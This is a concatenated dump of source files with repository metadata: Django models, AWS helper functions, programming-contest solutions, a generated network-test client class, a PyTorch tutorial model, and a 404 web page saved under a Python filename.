229da8f1da7b2924a17df7c56df8eef9f31d5ee1 | bc0d87befa0329c50c2e57ead730050b648e15c6 | /leaning_logs/models.py | 48d76ed238355d3f04b39298a65d73a02204d8a6 | [] | no_license | YGragon/DjangoLearningLogs | 85a0598849600536cdbf45cfb9444f36dfd31c57 | e3228aed7aa181d657b9aa58d93e9d37f09d918d | refs/heads/master | 2021-09-10T19:36:52.924500 | 2018-04-01T00:11:13 | 2018-04-01T00:11:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,676 | py | from django.db import models
from django.contrib.auth.models import User
import json
from datetime import date, datetime
class Topic(models.Model):
"""用户要学习的主题."""
text = models.CharField(max_length=200)
date_added = models.DateTimeField(auto_now_add=True)
# 外键是用户,可以通过这个外键确定这个主题属于哪个用户
owner = models.ForeignKey(User, "on_delete=models.CASCADE")
def __str__(self):
"""返回模型的字符串表示"""
return self.text
class Entry(models.Model):
"""用户发表的文章"""
# 外键是主题,可以通过这个外键确定这个文章属于哪个主题
topic = models.ForeignKey(Topic, "on_delete=models.CASCADE")
text = models.TextField()
date_added = models.DateTimeField(auto_now_add = True)
class Meta:
verbose_name_plural = 'entries'
def __str__(self):
"""返回模型的字符串表示"""
return self.text[:50] + "..."
class MyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime):
return obj.strftime('%Y-%m-%d %H:%M:%S')
elif isinstance(obj, date):
return obj.strftime("%Y-%m-%d")
else:
return json.JSONEncoder.default(self, obj)
class TopicEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, Topic):
return obj.text
return json.JSONEncoder.default(self, obj)
class EntryEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, Entry):
return obj.text
else:
return json.JSONEncoder.default(self, obj) | [
"[email protected]"
] | |
ca87266c74882e0db39d481e2bf5488941ec7f3e | 61e4cb5f60541939e122714aa085f2028a7904c5 | /duckdown/tool/provision/utils.py | 90d0b5cfc9e95d9eee414dbe564ed3dae2034188 | [
"MIT"
] | permissive | blueshed/duckdown | 1a07bf541a5849000d9e8622622cc67a3bec933f | e6d0e62d378bd2d9ed0cd5ce4bc7ab3476b86020 | refs/heads/master | 2023-01-30T12:18:05.713016 | 2020-12-08T20:38:36 | 2020-12-08T20:38:36 | 314,370,191 | 0 | 0 | MIT | 2020-12-08T14:54:11 | 2020-11-19T21:06:47 | Python | UTF-8 | Python | false | false | 711 | py | """ utils """
import boto3
from pkg_resources import resource_filename
def get_bucket_arn(bucket_name, region="", account_id=""):
""" We need the arn of a queue """
bucket_arn = f"arn:aws:s3:{region}:{account_id}:{bucket_name}"
return bucket_arn
def get_aws_region_account():
""" Return the aws region and account_id """
session = boto3.Session()
region = session.region_name
sts = session.client("sts")
response = sts.get_caller_identity()
return region, response["Account"]
def get_resource(name):
""" return resource content """
path = resource_filename("duckdown.tool.provision", f"resources/{name}")
with open(path) as file:
return file.read()
| [
"[email protected]"
] | |
7190f1bfb7ef37d25eff124ec59c652fd6d5cdf5 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02947/s893966605.py | 67b744e4b961123394465b52cb99e7a525a91c56 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | from collections import defaultdict
from collections import deque
from collections import Counter
import itertools
import math
def readInt():
return int(input())
def readInts():
return list(map(int, input().split()))
def readChar():
return input()
def readChars():
return input().split()
def comb(n,r):
return math.factorial(n)//math.factorial(r)//math.factorial(max(1,n-r))
def con(t):
ans = ""
for i in t:
ans+=i[0]+str(i[1])
return ans
n = readInt()
d = defaultdict(int)
for i in [input() for i in range(n)]:
t = defaultdict(int)
for j in i:
t[j]+=1
d[con(sorted(t.items()))]+=1
ans = 0
for i in d:
ans+=comb(d[i],2)
print(ans) | [
"[email protected]"
] | |
6671affb60476364415d4f792368ccdf01def877 | 0a949a1774607543de2dd5edf3a7efbbed3744c5 | /Day 25 power of 2.py | 498bb09544dee2f1fa49029e65f9e1572b050b82 | [] | no_license | AprajitaChhawi/365DaysOfCode.MARCH | ac46631665e508372b3ad6c9d57c89906f657f3d | dc1f70339491eb3ee194c62e1ded28695097d166 | refs/heads/main | 2023-03-28T12:34:56.499942 | 2021-04-01T17:45:22 | 2021-04-01T17:45:22 | 343,509,704 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 697 | py | #User function Template for python3
class Solution:
##Complete this function
# Function to check if given number n is a power of two.
def isPowerofTwo(self,n):
co=0
while(n>0):
n=n&(n-1)
co=co+1
if(co==1):
return 1
return 0
##Your code here
#{
# Driver Code Starts
#Initial Template for Python 3
import math
def main():
T=int(input())
while(T>0):
n=int(input())
ob=Solution()
if ob.isPowerofTwo(n):
print("YES")
else:
print("NO")
T-=1
if __name__=="__main__":
main()
# } Driver Code Ends
| [
"[email protected]"
] | |
9dcec2f68efa859cd5ef76a564687c9193dc6fd4 | 80b7f2a10506f70477d8720e229d7530da2eff5d | /ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocolstack/dhcphostsoptions_191fedb8ef50cd521c12d7ded5cc3bc5.py | 3b4eeaaa7619f809955d955aec4990941c12f30d | [
"MIT"
] | permissive | OpenIxia/ixnetwork_restpy | 00fdc305901aa7e4b26e4000b133655e2d0e346a | c8ecc779421bffbc27c906c1ea51af3756d83398 | refs/heads/master | 2023-08-10T02:21:38.207252 | 2023-07-19T14:14:57 | 2023-07-19T14:14:57 | 174,170,555 | 26 | 16 | MIT | 2023-02-02T07:02:43 | 2019-03-06T15:27:20 | Python | UTF-8 | Python | false | false | 8,259 | py | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
if sys.version_info >= (3, 5):
from typing import List, Any, Union
class DhcpHostsOptions(Base):
"""PortGroup settings placeholder for DHCPHostsPlugin.
The DhcpHostsOptions class encapsulates a list of dhcpHostsOptions resources that are managed by the user.
A list of resources can be retrieved from the server using the DhcpHostsOptions.find() method.
The list can be managed by using the DhcpHostsOptions.add() and DhcpHostsOptions.remove() methods.
"""
__slots__ = ()
_SDM_NAME = "dhcpHostsOptions"
_SDM_ATT_MAP = {
"ObjectId": "objectId",
}
_SDM_ENUM_MAP = {}
def __init__(self, parent, list_op=False):
super(DhcpHostsOptions, self).__init__(parent, list_op)
@property
def ObjectId(self):
# type: () -> str
"""
Returns
-------
- str: Unique identifier for this object
"""
return self._get_attribute(self._SDM_ATT_MAP["ObjectId"])
def add(self):
"""Adds a new dhcpHostsOptions resource on the server and adds it to the container.
Returns
-------
- self: This instance with all currently retrieved dhcpHostsOptions resources using find and the newly added dhcpHostsOptions resources available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
"""Deletes all the contained dhcpHostsOptions resources in this instance from the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, ObjectId=None):
# type: (str) -> DhcpHostsOptions
"""Finds and retrieves dhcpHostsOptions resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve dhcpHostsOptions resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all dhcpHostsOptions resources from the server.
Args
----
- ObjectId (str): Unique identifier for this object
Returns
-------
- self: This instance with matching dhcpHostsOptions resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of dhcpHostsOptions data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the dhcpHostsOptions resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def CustomProtocolStack(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the customProtocolStack operation on the server.
Create custom protocol stack under /vport/protocolStack
customProtocolStack(Arg2=list, Arg3=enum, async_operation=bool)
---------------------------------------------------------------
- Arg2 (list(str)): List of plugin types to be added in the new custom stack
- Arg3 (str(kAppend | kMerge | kOverwrite)): Append, merge or overwrite existing protocol stack
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = {"Arg1": self}
for i in range(len(args)):
payload["Arg%s" % (i + 2)] = args[i]
for item in kwargs.items():
payload[item[0]] = item[1]
return self._execute(
"customProtocolStack", payload=payload, response_object=None
)
def DisableProtocolStack(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[str, None]
"""Executes the disableProtocolStack operation on the server.
Disable a protocol under protocolStack using the class name
disableProtocolStack(Arg2=string, async_operation=bool)string
-------------------------------------------------------------
- Arg2 (str): Protocol class name to disable
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns str: Status of the exec
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = {"Arg1": self.href}
for i in range(len(args)):
payload["Arg%s" % (i + 2)] = args[i]
for item in kwargs.items():
payload[item[0]] = item[1]
return self._execute(
"disableProtocolStack", payload=payload, response_object=None
)
def EnableProtocolStack(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[str, None]
"""Executes the enableProtocolStack operation on the server.
Enable a protocol under protocolStack using the class name
enableProtocolStack(Arg2=string, async_operation=bool)string
------------------------------------------------------------
- Arg2 (str): Protocol class name to enable
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns str: Status of the exec
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = {"Arg1": self.href}
for i in range(len(args)):
payload["Arg%s" % (i + 2)] = args[i]
for item in kwargs.items():
payload[item[0]] = item[1]
return self._execute(
"enableProtocolStack", payload=payload, response_object=None
)
| [
"[email protected]"
] | |
d3fecc8b89dd54cd773450d6b1f0371b7586260a | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/55/usersdata/67/23126/submittedfiles/av2_p3_civil.py | 021be36901210757e4d1cd358ae7703c7b0c0ed6 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | # -*- coding: utf-8 -*-
from __future__ import division
import numpy as np
n=input("Digite a dimensão da matriz:")
pdp=input("Digite a posição a qual deseja pesar o valor da peça:")
linha=n
coluna=n
a=np.zeros((linha,coluna))
for i in range (0,a.shape[0],1):
for j in range (0,a.shape[1],1):
a[i,j]=input("Digite um elemento para a matriz:")
print a
| [
"[email protected]"
] | |
3edb99208215975625109feab3b281a6d20663b2 | c2fef17ef7644316da7f1f1d3819f67a4cdb21cb | /python/L1TCSCTF_cfi.py | 444847f551d3ae500d20283e9f2b8119607e6a63 | [] | no_license | rjwang/CSCTFDQM | cde5e937c3029a8309c189b20ad8253ff4e16df6 | 3dc419fad4f2cbf1b0cd1d4fb172a175f26d7025 | refs/heads/master | 2016-09-15T13:59:42.321400 | 2014-11-17T12:15:38 | 2014-11-17T12:15:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 578 | py | import FWCore.ParameterSet.Config as cms
l1tCsctf = cms.EDAnalyzer("L1TCSCTF",
#gmtProducer = cms.InputTag("gtDigis"),
gmtProducer = cms.InputTag("null"),
statusProducer = cms.InputTag("csctfDigis"),
outputFile = cms.untracked.string(''),
lctProducer = cms.InputTag("csctfDigis"),
verbose = cms.untracked.bool(False),
gangedME11a = cms.untracked.bool(True),
trackProducer = cms.InputTag("csctfDigis"),
mbProducer = cms.InputTag("csctfDigis:DT"),
DQMStore = cms.untracked.bool(True),
disableROOToutput = cms.untracked.bool(True)
)
| [
"[email protected]"
] | |
a4479a3d1bc8e0e338b8104a625f384ee5214c0c | 47c39800fa6f928e0d13f26727ba52bda2aa6ff0 | /One/migrations/0013_knowledgemediastore_m_k_ip.py | 3c2b40b750f7a0ed28e290d0e62cc7022e06c04f | [
"MIT"
] | permissive | dddluke/zhihuipingtai | 952ed5f9a4011cb4fb2765a0571c978af784d708 | 4e46e01440f8c270c05259ac0f38bd56dd04016c | refs/heads/master | 2023-03-09T03:32:47.807760 | 2021-02-26T02:36:10 | 2021-02-26T02:36:10 | 341,816,381 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 424 | py | # Generated by Django 3.1.2 on 2020-10-13 08:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('One', '0012_solution_s_user_name'),
]
operations = [
migrations.AddField(
model_name='knowledgemediastore',
name='m_k_ip',
field=models.CharField(max_length=40, null=True),
),
]
| [
"[email protected]"
] | |
c6c98662e4fa436e5465b70a23c3c113752a5975 | 1b287461e9bb550b96c1e2eff7e6c716ab7d536e | /pytorch/neuralNetwork.py | 5ee68b460804d9842c9aa3027d8dfb849cc9aadf | [] | no_license | TQCAI/python-study-notebook | 64b9c7bfaa6c47ef2d783aa2a36ba914d13b9db2 | e0a9eee556c3da7441e5be6ee4baf16f1ae075a9 | refs/heads/master | 2020-05-18T19:28:27.998087 | 2019-05-04T10:29:10 | 2019-05-04T10:29:10 | 184,609,373 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,820 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
# 1 input image channel, 6 output channels, 5x5 square convolution
# kernel
self.conv1 = nn.Conv2d(1, 6, 5)
self.conv2 = nn.Conv2d(6, 16, 5)
# an affine operation: y = Wx + b
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
# Max pooling over a (2, 2) window
x = F.max_pool2d(F.relu(self.conv1(x)), 2)
# If the size is a square you can only specify a single number
x = F.max_pool2d(F.relu(self.conv2(x)), 2)
# resize 矩阵为向量
x = x.view(-1, self.num_flat_features(x))
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
def num_flat_features(self, x):
size = x.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
net = Net()
print(net)
params = list(net.parameters())
print(len(params))
print(type(params[0]))
input = torch.randn(1, 1, 32, 32)
out = net(input)
print(out)
net.zero_grad()
out.backward(torch.randn(1, 10))
output = net(input)
target = torch.randn(10) # a dummy target, for example
target = target.view(1, -1) # make it the same shape as output
criterion = nn.MSELoss()
loss = criterion(output, target)
print(loss)
print(loss.grad_fn)
net.zero_grad() # zeroes the gradient buffers of all parameters
loss.backward()
print('conv1.bias.grad after backward')
print(net.conv1.bias.grad)
learning_rate = 0.01
for f in net.parameters():
f.data.sub_(f.grad.data * learning_rate) | [
"[email protected]"
] | |
6ecdc9780c6cd6e6fa0b22b17660a4e8a3cd2d8a | 8015f1c62a2cb4efd21aa8938336913bf8117868 | /bamap/ba3689.pngMap.py | 4333c396bc7970c3323a63989426ae8f56f57b9d | [] | no_license | GamerNoTitle/Beepers-and-OLED | 675b5e3c179df0f0e27b42bf594c43860d03b9af | afe1340e5394ae96bda5f9022a8a66824368091e | refs/heads/master | 2020-04-20T00:09:47.122471 | 2019-04-29T04:59:35 | 2019-04-29T04:59:35 | 168,515,579 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 8,468 | py | ba3689.pngMap = [
'11111111111111111111111111111111111111111111111111111111111111000000111111111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111111111111111111000000111111111111111111111111111111111111111111111111111111111111',
'11111111111111111100001111111111110001011111111111111111111111100110111111111111111111111111111111111111111111111111111111111110',
'11111111111111111011101011111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',
'11111111111111111001111111111111111111111111111111110000111111111111111111111111111111111111111111111111111111111111111111111111',
'11011111111111111001111111111111111111111111111111111001111111111111111111111111111111111111111111111111111111111111111111111111',
'01001111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',
'01001111111111111110111111111111111111011111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',
'10111111111111111111111111111111111111111111111111111111111110111111111111111111111111111111111111111111111111111111111111111111',
'11111111100001111111111111111111111111111111111111111111110001001111111111111111111111111111111111111111111111111111111111111111',
'11111111110011111111111111111111111111111111111111111111111111001111111111111111111111111111111111111111111111111111111111111110',
'11111111111001111111111111111111111111111111111111111111111111001111111111111111111111111111111111111111111111111111111111111110',
'11111111111111111111111111111111111111111111111111111111111000001111111111111111111111111111111111111111111111111111111111111110',
'11111111111111111111111111111111111111111111111111111111100000000111111111111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111111111111000000000000111111111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111111111110000000000000011111111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111100000001001111111111100000000000000001111111111111111111111111111111111111001111111111111111111',
'11100111111111111111111111111111111111111111111111110100000000000000000111111111111111111111111111111111111111111111111111111111',
'11101111111111111111111111111111111111111111111111100000000000000000001111111111111111111111111111111111111111111111111111111111',
'11111100111111111111111111111111111111111111111111100000000000000000001111111111111111111111111111110111111111111111111111111111',
'11111111111111111111111111111111111111111111111100000000000000000001111111010100000000000000111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111100000000000000000000111010000000000000000001011111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111000000000000000000100000000000000000000000000001111111111111111111111111111111111',
'11111111111111111111111111111111111111111111101100000000000000000000000000000000000000000000000011111111111111111111111111111111',
'11111111111111111111111111111111111111111111001100000000000000000000000000000000000000000000000000111111111111111111111111111111',
'11111111111111111111111111111111111111111110011111000000000000000000000000000000000000000000000000111111111111111111111111111111',
'11111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000011111111111111111111111111',
'11111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000011111111111111111111111111',
'11111111111111111111111111111001111111111111111111110000000000000000000000000000000000000000000000000011110011111111111111111111',
'11111111111111111111111111111101111111111111111111111100000000000000000000000000000000000000000000000111110011111111111111111111',
'11111111111111111111111111111111111111111111111111111000000000000000000000000000000000000000000000000011111111111111111111111111',
'11111111111111111111111111111111111111111111111111111100000000000000000000000000000000000000000000000010001111111111111111111111',
'11111111111111111111111111111111111111111111111111111000000000000000000000000000000000000000000000000001001111111111111111111111',
'11111111111111111111111111111111111111111111111111111000000000000000000000000000000000000000000000000001101111111111111111111111',
'11111111111111111111111111111111111111111111111111111100000000000000000000000000000000000000000000000000101111111111111111111111',
'11111111111111111111111111111111111111111111111111111000000000000000010000000000000000000000000000000000101111111111111111111111',
'11111111111111111111001111111111111111111111111111100000000000000000000000000000000000000000000000000000111111111111111111111111',
'11111111111111111111001111111111111111111111111111111100000000000000010000000000000000000000000000000000111111111111111111111111',
'11111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000001101111111111111111111111',
'11111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000011101111111111111111111111',
'11111111111111111111111111111111111111111111111111111111000000000000000000100000000000000000000000000000111111100011111111111111',
'11111111111111111111111111111111111111111111111111111100000000000000000000000000000000000000000000000000111111100011111111111111',
'11111111111111111111111111111111111111111111111111110100000000000000000000000011000000000000000000001011111111100001111111111111',
'11111111111111111111111111111111011111111111111111110000000000000000000011000011100000000000000000001111111111100011111111111111',
'11000011111111111111111111111111001111111111111111000000000000000000000000001011010011000000000010111111111111101111111111111111',
'11111111111111111111111111111111001111111111111110000000000000000000000000000011111111110000111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111001000000000000000000000000011111111111111111111111111111111111111111111111111111110',
'11111011111111111111111111111111111111111111001000000000000000000000000011111111111111111111111111111111111111111111111111111111',
'10000111111111111111111111111111111111111100000000000000000000000000000001111111111111111111111111111111111111111111111111111111',
'11011111111111111111111111111111111111111100000000000000000000000000000011111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111100000000000000000000000000000000000011111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111000000000000000000000000000000000000001111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111110000000000000000000000000000000000000000111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111110000000000000000000000000000000000000001111111111111111111111111111111111111111011111111111111',
'11111111111111111111111111111111000000000000000000000000000000000000000000111111111111111111111111111111111110000101111111111111',
'11111111111111111111111111111111000000000000000000000000000000000000000000111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111100000000000000000000000000000000000000000000111111111111111111111111111111111110000001111111111111',
'11111111111111111111111111111110000000000000000000000000000000000000000000111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111110000000000000000000000000000000000000000000001111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111000000000000000000000000000000000000000000001111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111110000000000000000000000000000000000000000101111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111110000000000000000000000000000000000000000001111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111110000000000000000000000000000000000000001111111111111111111111111111111111110000000111111111',
'11111111111111111111111111111111111111100000000000000000000000000000000000011111111111111111111111111111111111111001111111111111',
]
| [
"[email protected]"
] | |
be374b162f988d88dda2b249e3f6c373e8addd04 | 0529196c4d0f8ac25afa8d657413d4fc1e6dd241 | /runnie0427/10868/10868.py3.py | d822d78334509fa88d0777cfd0db8f9b9b10472d | [] | no_license | riyuna/boj | af9e1054737816ec64cbef5df4927c749808d04e | 06420dd38d4ac8e7faa9e26172b30c9a3d4e7f91 | refs/heads/master | 2023-03-17T17:47:37.198570 | 2021-03-09T06:11:41 | 2021-03-09T06:11:41 | 345,656,935 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,372 | py | <!DOCTYPE html>
<html lang="ko">
<head>
<title>Baekjoon Online Judge</title><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta charset="utf-8"><meta name="author" content="스타트링크 (Startlink)"><meta name="keywords" content="ACM-ICPC, ICPC, 프로그래밍, 온라인 저지, 정보올림피아드, 코딩, 알고리즘, 대회, 올림피아드, 자료구조"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta property="og:type" content="website"><meta property="og:image" content="http://onlinejudgeimages.s3-ap-northeast-1.amazonaws.com/images/boj-og-1200.png"><meta property="og:site_name" content="Baekjoon Online Judge"><meta name="format-detection" content = "telephone=no"><meta name="msapplication-config" content="none"><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"><link rel="manifest" href="/site.webmanifest"><link rel="mask-icon" href="/safari-pinned-tab.svg" color="#0076c0"><meta name="msapplication-TileColor" content="#00aba9"><meta name="theme-color" content="#ffffff"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.2.0/css/bootstrap.min.css"><link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/unify/css/style.css?version=20210107"><link href="https://fonts.googleapis.com/css?family=Noto+Sans+KR:400,700|Open+Sans:400,400i,700,700i|Source+Code+Pro&subset=korean" rel="stylesheet"><link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/css/connect.css?version=20210107"><link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/css/result.css?version=20210107"><link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/unify/css/custom.css?version=20210107"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.6.3/css/font-awesome.css"><link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/unify/css/theme-colors/blue.css?version=20210107"><link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/css/pace.css">
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-10874097-3"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-10874097-3');
</script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/noty/3.1.4/noty.min.css" /><meta name="username" content="">
<link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/unify/css/pages/page_404_error.css">
</head>
<body>
<div class="wrapper">
<div class="header no-print"><div class="topbar"><div class="container"><ul class="loginbar pull-right"><li><a href = "/register">회원가입</a></li><li class="topbar-devider"></li><li><a href = "/login?next=%2Fsource%2Fdownload%2F16222671">로그인</a></li></ul></div></div><div class="navbar navbar-default mega-menu" role="navigation"><div class="container"><div class="navbar-header"><button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-responsive-collapse"><span class="sr-only">Toggle navigation</span><span class="fa fa-bars"></span></button><a class="navbar-brand" href="/"><img id="logo-header" src="https://d2gd6pc034wcta.cloudfront.net/images/[email protected]" alt="Logo" data-retina></a></div><div class="collapse navbar-collapse navbar-responsive-collapse"><ul class="nav navbar-nav"><li class="dropdown mega-menu-fullwidth "><a href="javascript:void(0);" class="dropdown-toggle" data-toggle="dropdown">문제</a><ul class="dropdown-menu"><li><div class="mega-menu-content"><div class="container"><div class="row equal-height"><div class="col-md-3 equal-height-in"><ul class="list-unstyled equal-height-list"><li><h3>문제</h3></li><li><a href = "/problemset">전체 문제</a></li><li><a href = "/category">문제 출처</a></li><li><a href = "/step">단계별로 풀어보기</a></li><li><a href = "/problem/tags">알고리즘 분류</a></li><li><a href = "/problem/added">새로 추가된 문제</a></li><li><a href = "/problem/added/1">새로 추가된 영어 문제</a></li><li><a href = "/problem/ranking">문제 순위</a></li></ul></div><div class="col-md-3 equal-height-in"><ul class="list-unstyled equal-height-list"><li><h3>문제</h3></li><li><a href="/problem/only">푼 사람이 한 명인 문제</a></li><li><a href="/problem/nobody">아무도 못 푼 문제</a></li><li><a href="/problem/recent/submit">최근 제출된 문제</a></li><li><a href="/problem/recent/accepted">최근 풀린 문제</a></li><li><a href="/problem/random">랜덤</a></li></ul></div><div class="col-md-3 equal-height-in"><ul class="list-unstyled equal-height-list"><li><h3>출처</h3></li><li><a href = "/category/1">ICPC</a></li><li><a href = "/category/2">Olympiad</a></li><li><a href = "/category/55">한국정보올림피아드</a></li><li><a href = "/category/57">한국정보올림피아드시․도지역본선</a></li><li><a href = "/category/318">전국 대학생 프로그래밍 대회 동아리 연합</a></li><li><a href = "/category/5">대학교 대회</a></li><li><a href = "/category/428">카카오 코드 페스티벌</a></li><li><a href = "/category/215">Coder's High</a></li></ul></div><div class="col-md-3 equal-height-in"><ul class="list-unstyled equal-height-list"><li><h3>ICPC</h3></li><li><a href = "/category/7">Regionals</a></li><li><a href = "/category/4">World Finals</a></li><li><a href = "/category/211">Korea Regional</a></li><li><a href = "/category/34">Africa and the Middle East Regionals</a></li><li><a href = "/category/10">Europe Regionals</a></li><li><a href = "/category/103">Latin America Regionals</a></li><li><a href = "/category/8">North America Regionals</a></li><li><a href = "/category/92">South Pacific Regionals</a></li></ul></div></div></div></div></li></ul></li><li><a href = "/workbook/top">문제집</a></li><li><a href = "/contest/official/list">대회<span class='badge badge-red rounded-2x'>2</span></a></li><li><a href = "/status">채점 현황</a></li><li><a href = "/ranklist">랭킹</a></li><li><a href = "/board/list/all">게시판</a></li><li><a href = "/group/list/all">그룹</a></li><li><a href = "/blog/list">블로그</a></li><li><a href = "/lectures">강의</a></li><li><a href = "/search"><i class="fa fa-search search-btn"></i></a></li></ul></div></div></div></div><form action="/logout" method="post" id="logout_form"><input type='hidden' value='%2Fsource%2Fdownload%2F16222671' name="next"></form>
<div class="container content">
<div class="col-md-8 col-md-offset-2">
<div class="error-v1">
<span class="error-v1-title">404</span>
<span>Not found</span>
<div class="margin-bottom-20"></div>
</div>
<div class="text-center">
